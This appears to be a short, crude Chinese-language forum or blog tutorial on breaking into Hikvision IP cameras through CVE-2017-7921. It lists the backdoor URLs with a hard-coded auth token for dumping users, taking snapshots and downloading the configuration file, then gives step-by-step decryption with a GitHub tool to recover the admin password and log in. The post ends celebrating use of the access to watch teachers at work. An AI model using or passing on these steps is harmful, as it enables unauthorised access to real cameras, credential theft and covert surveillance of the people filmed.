该漏洞简而言之就是某个该死的家伙留的后门
访问http://填摄像头ip地址/Security/users?auth=YWRtaW46MTEK 看看有没有返回用户信息
有的话说明该设备存在CVE-2017-7921漏洞,没有的话可以试试看CVE-2021-36260漏洞(也许之后我会出教程)
访问http://填摄像头ip地址/onvif-http/snapshot?auth=YWRtaW46MTEK 看看返回的快照
欸,这肯定没意思对吧
不能动的不好玩啊你说是不是
来点能动的
访问http://填摄像头ip地址/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件
到这儿下载解密工具https://github.com/WormChickenWizard/hikvision-decrypter
github上不去的自己TMD去搜去学,不然你就是笨蛋
点右下角四个按钮中第一行第二个,选择你刚刚下载的摄像头配置文件,选择好后会弹一个对话框,点左边的按钮
然后再点右下角四个按钮中第二行第一个按钮解密
解密后点上一步中点的按钮右边的那个按钮保存配置文件
用随便什么十六进制编辑器打开刚刚那个保存下来的鬼玩意
然后搜索admin,admin下方就会有密码
直接登录摄像头web页面~
爽!监督老师们工作!
其他没了


张三 更多

头像